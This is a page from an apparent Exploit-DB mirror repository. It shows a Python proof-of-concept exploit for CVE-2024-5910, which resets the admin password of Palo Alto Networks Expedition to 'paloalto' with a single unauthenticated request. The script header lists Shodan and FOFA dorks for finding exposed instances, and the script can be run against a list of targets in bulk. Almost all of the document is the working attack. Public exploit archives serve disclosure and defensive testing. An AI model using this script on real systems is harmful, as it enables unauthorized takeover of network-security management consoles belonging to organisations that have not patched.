bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52129.py
Exploit-DB 881542919e DB: 2025-04-07 
7 changes to exploits/shellcodes/ghdb

DataEase 2.4.0 - Database Configuration Information Exposure

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
Watcharr 1.43.0 - Remote Code Execution (RCE)
WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload

Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)
2025-04-07 00:16:26 +00:00

57 lines
No EOL
2.7 KiB
Python
Executable file
Raw Blame History

################################################################################################
############################ #
#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool #
#- Shodan Dork: html:"expedition project" #
#- FOFA Dork: "expedition project" && icon_hash="1499876150" #
#- Exploit Author: ByteHunter #
#- Email: 0xByteHunter@proton.me #
#- Vulnerable Versions: 1.2 < 1.2.92 #
#- Tested on: 1.2.90.1 & 1.2.75 #
#- CVE : CVE-2024-5910 #
############################ #
################################################################################################
import requests
import argparse
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)
ENDPOINT = '/OS/startup/restore/restoreAdmin.php'
def send_request(base_url):
url = f"{base_url}{ENDPOINT}"
print(f"Testing URL: {url}")
try:
response = requests.get(url, verify=False, timeout=7)
if response.status_code == 200:
print("✓ Admin password restored to: 'paloalto'\n")
print("✓ admin panel is now accessable via ==> admin:paloalto creds")
else:
print(f"Request failed with status code: {response.status_code}\n")
except requests.exceptions.RequestException as e:
print(f"Error sending request to {url}") #{e}
def main():
parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
parser.add_argument('-u', '--url', type=str, help='single target URL')
parser.add_argument('-l', '--list', type=str, help='URL target list')
args = parser.parse_args()
if args.url:
send_request(args.url)
elif args.list:
try:
with open(args.list, 'r') as file:
urls = file.readlines()
for base_url in urls:
send_request(base_url.strip())
except FileNotFoundError:
print(f"File not found: {args.list}")
else:
print("I need a URL address with -u or a URL file list with -l.")
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink